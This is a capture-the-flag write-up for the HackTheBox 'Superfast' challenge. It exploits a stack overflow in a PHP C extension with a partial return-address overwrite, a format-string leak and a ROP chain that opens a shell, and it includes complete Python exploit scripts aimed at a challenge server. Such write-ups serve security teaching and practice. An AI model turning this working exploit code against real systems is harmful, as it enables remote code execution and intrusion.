Superfast (HackTheBox)
Hey folks. In this write-up, we're going to discuss the Superfast challenge in HackTheBox which was part of the HackTheBox Business CTF 2022. We're going to perform a single-byte overwrite to bypass ASLR, leak stack pointers, and perform a Return Oriented Programming (ROP) chain. The description of the challenge is:
We've tracked connections made from an infected workstation back to this server. We believe it is running a C2 checkin interface, the source code of which we aquired from a temporarily exposed Git repository several months ago.Apparently the engineers behind it are obsessed with speed, extending their programs with low-level code. We think in their search for speed they might have cut some corners - can you find a way in?
I really enjoyed pwning this challenge since it has a unique and quite realistic target which I haven't seen before in CTFs.
Index
- First looks
- Finding primitives
- Developing the ROP chain
- Retrieving the flag
First looks
We're given a PHP file with a shared object (.so) written in C, and we're given a source directory for the shared object.
.
├── build_docker.sh
├── challenge
│ ├── index.php
│ ├── php_logger.so
│ └── start.sh
├── Dockerfile
└── src
├── build.sh
├── config.m4
├── php_logger.c
└── php_logger.h
2 directories, 9 files
Directories given with the challenge
In /challenge/start.sh
we can see that the challenge code gets bootstrapped using:
#!/bin/sh
while true; do php -dextension=/php_logger.so -S 0.0.0.0:1337; done
The content of start.sh
We can see that PHP loads php_logger.so
as a binary extension for the webserver.
Finding primitives
To start, a vulnerability primitive is a building block of an exploit. A primitive can be bundled with other primitives to achieve a higher impact, like teamwork.
Analysing index.php
The content of index.php (below) checks for a header called Cmd-Key
and a parameter cmd
.
<?php
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
$key = intval($_SERVER['HTTP_CMD_KEY']);
if ($key <= 0 || $key > 255) {
http_response_code(400);
} else {
log_cmd($_GET['cmd'], $key);
}
} else {
http_response_code(400);
}
Content of index.php
One of the most important stages of exploit development is making a reproducing environment. Considering I want to run GDB on php_logger.so
, I will run the challenge without Docker. I can run the PHP index.php
with php -dextension=./php_logger.so -S 0.0.0.0:1337
in /challenge/
and I can send the HTTP request using curl '
http://127.0.0.1:1337/index.php?cmd=123
' -H 'Cmd-Key: 123
. We can see it succeeds because it returns a 200 status code.
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Accepted
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 [200]: GET /?cmd=123
[Sat Nov 26 20:04:55 2022] 127.0.0.1:43846 Closing
Verbose output of the PHP webserver
Regarding functionality, we can see that index.php
calls log_cmd($cmd, $key)
with 0 < $key < 256
.
Analyzing php_logger.so
We can find the source code of php_logger.so
in /src/php_logger.c
. Under which, we can find the source code of log_cmd()
as well. We can see that log_cmd() retrieves function arguments using zend_parse_parameters()
. Then, it calls decrypt($cmd, $cmdlen, $key)
and - if the return is valid - appends to the /tmp/log
file.
PHP_FUNCTION(log_cmd) {
char* input;
zend_string* res;
size_t size;
long key;
if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
RETURN_NULL();
}
res = decrypt(input, size, (uint8_t)key);
if (!res) {
print_message("Invalid input provided\n");
} else {
FILE* f = fopen("/tmp/log", "a");
fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
fclose(f);
}
RETURN_NULL();
}
Source code of log_cmd()
This function does look safe, so the vulnerability is in decrypt(input, size, key)
. This function checks if the size of the command is less than the size of the stack buffer. If it is more it will return, but if it is less it will memcpy() and XOR the buffer with the key.
zend_string* decrypt(char* buf, size_t size, uint8_t key) {
char buffer[64] = {0};
if (sizeof(buffer) - size > 0) {
memcpy(buffer, buf, size);
} else {
return NULL;
}
for (int i = 0; i < sizeof(buffer) - 1; i++) {
buffer[i] ^= key;
}
return zend_string_init(buffer, strlen(buffer), 0);
}
Source code of decrypt()
We can see that sizeof(buffer) - size > 0
is used for the size check. However, sizeof()
returns size_t
, which is an unsigned integer on 32-bit and (in this case) an unsigned long on 64-bit. Since we are essentially doing ulong - int > int
, we are using an unsigned value as a base value which means the value will wrap around. For example, in this case (uint)0 - (int)1
would become 2**32-1
, instead of -1
. A practical example would be the one below. The output of the program is 4294967295 1
.
int main()
{
unsigned int a = 5;
int b = 6;
printf("%u %d", a - b, a - b > 0);
}
Demo of interaction between (unsigned) integers
That means that sizeof(buffer) - size > 0)
is always true, unless sizeof(buffer) == size
. The result of that is a buffer overflow on the stack which we can leverage for a control flow hijacking primitive. Using Ghidra - the reverse engineering suite developed by the NSA - we can see that the offset from the buffer to the return address on the stack is 0x98 (152) bytes.
![](https://pwning.tech/content/images/2022/11/image-6.png)
However, ASLR is enabled. That means that we cannot guess the library's memory address and hence cannot guess a return address for control flow hijacking. However, the smallest 12 bits of an address are not random, and thus can we reliably overwrite 12 bits of the return address. Say our normal return address would be 0x555555559a1e
, in the next program, it could be 0x55555123fa1e
, but the 0xa1e
at the end doesn't change, because it's the smallest 12 bits.
The reason only the first 12 bits of the address don't change, is because they point to 4096 bytes (2 ** 12 bits), which is the page size. The kernel - the manager of ASLR - can't work with addresses smaller than 4096 bytes.
Sadly, we can only write bundles of 8 bits (1 byte) at a time considering we're working with a char
data type. This means we could only overwrite the 0x1e
part of the addresses listed above, which narrows our possible return address area.
In Ghidra, we can figure out that the return address from decrypt()
to log_cmd()
(without ASLR) is equal 0x1014129
. This means our scope of possible return addresses ranges from 0x1014100
to 0x10141ff
.
0010141e 48 89 ce MOV param_2,RCX
00101421 48 89 c7 MOV param_1,RAX
00101424 e8 07 fc CALL decrypt
ff ff
00101429 48 89 44 MOV qword ptr [RSP + local_10],RAX
24 38
0010142e 48 83 7c CMP qword ptr [RSP + local_10],0x0
24 38 00
The code in our return scope is the following. We can see that decrypt()
is called, print_message()
is called and a bunch of file IO functions. Internally, print_message()
is a wrapper for php_printf()
: the printf() function in PHP. This is interesting because it outputs to the HTTP response body, which means that we can leak pointers.
*(undefined4 *)(param_2 + 8) = 1;
}
else {
iVar1 = decrypt(local_20,local_28,(size_t *)(local_30 & 0xff),local_28,(size_t)inlen);
local_10 = CONCAT44(extraout_var,iVar1);
if (local_10 == 0) {
print_message("Invalid input provided\n");
}
else {
local_18 = fopen("/tmp/log","a");
fwrite((void *)(local_10 + 0x18),*(size_t *)(local_10 + 0x10),1,local_18);
fclose(local_18);
}
*(undefined4 *)(param_2 + 8) = 1;
}
return;
}
C decompilation of our return scope
However, in order to leak pointers with print_message()
, we need to set the RDI register to the printf format string. Fortunately, the RDI register is set to the input
argument of decrypt(char* buf, size_t size, uint8_t key)
at 0x101390
.
00101385 48 8b 84 MOV RAX,qword ptr [RSP + local_18]
24 a0 00
00 00
0010138d 48 89 c6 MOV inputlen,RAX
00101390 48 89 cf MOV input,param_4
00101393 e8 e8 fc CALL <EXTERNAL>::memcpy
ff ff
00101398 48 8b 54 MOV key,qword ptr [RSP + local_58]
24 60
Assembly code which moves the input into the RDI register
When I try to fuzz using a script, I receive the following output:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA@\x81\xd5\x84U\x80~
Fuzzing output
from pwn import xor
import requests
xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}
# offset = 152
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(xor(content, xorkey))
Script used to fuzz
However, when we remove the xor()
function call, we can see that the end of the response is an address like b'A\x80\xd4\x85T\x81\x7f'
. Using print(hex(u64(content[63:].ljust(8, b'\x00'))))
we can translate it to 0x7f815485d48041
. In order to identify where this leak happens, we can start a GDB server. We leak the address 0x7f651305f54041
and in GDB we can see with vmmap
(in pwndbg) that this falls under 0x7f6513000000 0x7f6513200000 rw-p 200000 0 [anon_7f6513000]
. Since this isn't executable it's irrelevant for the ROP chain.
from pwn import xor, gdb, u64
import requests
import time
gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(5)
xorkey = 1
s = requests.session()
headers = {"cmd-key": str(xorkey)}
payload = b"A"*152 + b"\x40"
content = s.get(b"http://127.0.0.1:1337?cmd="+payload, headers=headers).content
print(hex(u64(content[63:].ljust(8, b'\x00'))))
time.sleep(999)
Script for debugging using GDB
Since that is useless, we need to find another way to leak addresses. To do that, we can utilize the fact that we're calling printf()
. By supplying a payload like %08x %08x %08x %08x
we can leak the stack. By trial and error, I found out that we can leak the stack, php_logger.so and the PHP binary using the format string %llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_
. Using the following payload, we can see the following leaks:
php @ 0x55c720a64000
php_logger.so @ 0x7f609866e000
stack @ 0x7fff10fbd480
Output of the script
#!/usr/bin/env python3
from pwn import xor, u64, gdb
import requests
import time
gdb.debug(args=['php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
time.sleep(3)
xorkey = 0x4
s = requests.session()
headers = {"cmd-key": str(xorkey)}
fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), xorkey) + b"\x40"
url = b"http://127.1:1337/index.php?cmd=" + payload
print(url)
content = s.get(url, headers=headers).content
addresses = content.split(b"_")
php_base = int(addresses[5], 16)-0x55e240
logger_base = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)
print("php @", hex(php_base))
print("php_logger.so @", hex(logger_base))
print("stack @", hex(stack))
time.sleep(999)
Payload for leaking addresses
We have the needed primitives, so we can develop the ROP chain.
Developing the ROP chain
Now we can use pwntools' ELF classes in order to make automatic ROP-chains. Using pwntools' ELF class we can see that the execl
function in the PLT section of the php
binary. This means we can use it to spawn a shell. Our strategy is:
- Leaking the address of the PHP binary and the
php_logger.so
in memory. - dup2(4, N) to set stdin, stdout and stderr file descriptors to the TCP connection file descriptor for the webserver.
- execl("/bin/sh", "/bin/sh", 0) to spawn the /bin/sh executable
We can generate a ROP chain automatically with pwntools:
rop = ROP(php)
'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''
# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])
print(rop.dump())
Python code for generating the ROP chain
Which gives the following ROP chain:
0x0000: 0x56244b60816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x56244b6043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x56244b601be0 dup2
0x0028: 0x56244b60816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x56244b6043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x56244b601be0 dup2
0x0050: 0x56244b60816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x56244b6043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x56244b601be0 dup2
0x0078: 0x56244b60816b pop rdi; ret
0x0080: 0x56244bd03fc3 [arg0] rdi = 94713890750403
0x0088: 0x56244b60487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x56244b6043fc pop rsi; ret
0x00a0: 0x56244bd03fc3 [arg1] rsi = 94713890750403
0x00a8: 0x56244b6042d0 execl
ROP chain generated by pwntools
As we can see, it does the following:
dup(4, 0)
dup(4, 1)
dup(4, 2)
execl("/bin/sh", "/bin/sh", 0)
C representation of the ROP chain
Retrieving the flag
I coded the following script to utilize the ROP chain. If we run this, we get a shell on the box.
#!/usr/bin/env python3
from pwn import xor, u64, gdb, ELF, p64, remote, ROP, context
import requests
import time
import urllib
#gdb.debug(args=['/usr/bin/php', '-t', './pwn_superfast/challenge', '-dextension=./pwn_superfast/challenge/php_logger.so', '-S', '0.0.0.0:1337'], gdbscript='continue')
#time.sleep(5)
target_ip = b"161.35.173.232"
target_port = b"31302"
target_host = b"http://" + target_ip + b":" + target_port
s = requests.session()
headers = {"cmd-key": "1"}
fmt = b'%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_%llx_'
payload = xor(fmt + b"A"*(152 - len(fmt)), 1) + b"\x40"
print("[*] sending payload...")
content = s.get(target_host + b"/index.php?cmd=" + payload, headers=headers).content
addresses = content.split(b"_")
print("[*] loading addresses...")
# set context for ROP()
#context.binary = php = ELF('/usr/bin/php', checksec=False)
context.binary = php = ELF('./php', checksec=False)
php.address = int(addresses[5], 16) - php.sym.executor_globals
php_logger = ELF('pwn_superfast/challenge/php_logger.so', checksec=False)
php_logger.address = int(addresses[8], 16)-0x1445
stack = int(addresses[0], 16)
print("[+] php @", hex(php.address))
print("[+] php_logger.so @", hex(php_logger.address))
print("[+] stack @", hex(stack))
rop = ROP(php)
'''
fd[0] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[1] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[2] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
fd[3] tcp 0.0.0.0:1337 => 0.0.0.0:0 (listen)
fd[4] tcp 172.17.0.1:1337 => 10.64.190.187:42088 (established)
'''
# set connection socket to stdin/stdout/stderr
rop.call('dup2', [4, 0])
rop.call('dup2', [4, 1])
rop.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/sh\x00"))
rop.call('execl', [binsh, binsh, 0])
print(rop.dump())
payload = b'A'*152 + rop.chain()
http = "GET /index.php?cmd=" + urllib.parse.quote(payload) + " HTTP/1.1\n"
http += "Cmd-Key: 1\n\n"
print("[*] sending payload for shell...")
p = remote(target_ip, int(target_port))
p.send(http.encode())
p.interactive()
time.sleep(999)
Python script for retrieving the flag
$ python3 script.py
[*] sending payload...
[*] loading addresses...
[+] php @ 0x55da3ce00000
[+] php_logger.so @ 0x7fb906c50000
[+] stack @ 0x7ffee56eddc0
[*] Loaded 327 cached gadgets for './php'
0x0000: 0x55da3d00816b pop rdi; ret
0x0008: 0x4 [arg0] rdi = 4
0x0010: 0x55da3d0043fc pop rsi; ret
0x0018: 0x0 [arg1] rsi = 0
0x0020: 0x55da3d001be0 dup2
0x0028: 0x55da3d00816b pop rdi; ret
0x0030: 0x4 [arg0] rdi = 4
0x0038: 0x55da3d0043fc pop rsi; ret
0x0040: 0x1 [arg1] rsi = 1
0x0048: 0x55da3d001be0 dup2
0x0050: 0x55da3d00816b pop rdi; ret
0x0058: 0x4 [arg0] rdi = 4
0x0060: 0x55da3d0043fc pop rsi; ret
0x0068: 0x2 [arg1] rsi = 2
0x0070: 0x55da3d001be0 dup2
0x0078: 0x55da3d00816b pop rdi; ret
0x0080: 0x55da3d703fc3 [arg0] rdi = 94395821998019
0x0088: 0x55da3d00487c pop rdx; ret
0x0090: 0x0 [arg2] rdx = 0
0x0098: 0x55da3d0043fc pop rsi; ret
0x00a0: 0x55da3d703fc3 [arg1] rsi = 94395821998019
0x00a8: 0x55da3d0042d0 execl
[*] sending payload for shell...
[+] Opening connection to b'161.35.173.232' on port 31302: Done
[*] Switching to interactive mode
sh: turning off NDELAY mode
$ whoami
ctf
Output of the exploit
Thanks for reading my write-up about the HackTheBox Business CTF 2022 Superfast challenge; I hope you learned as much as I did.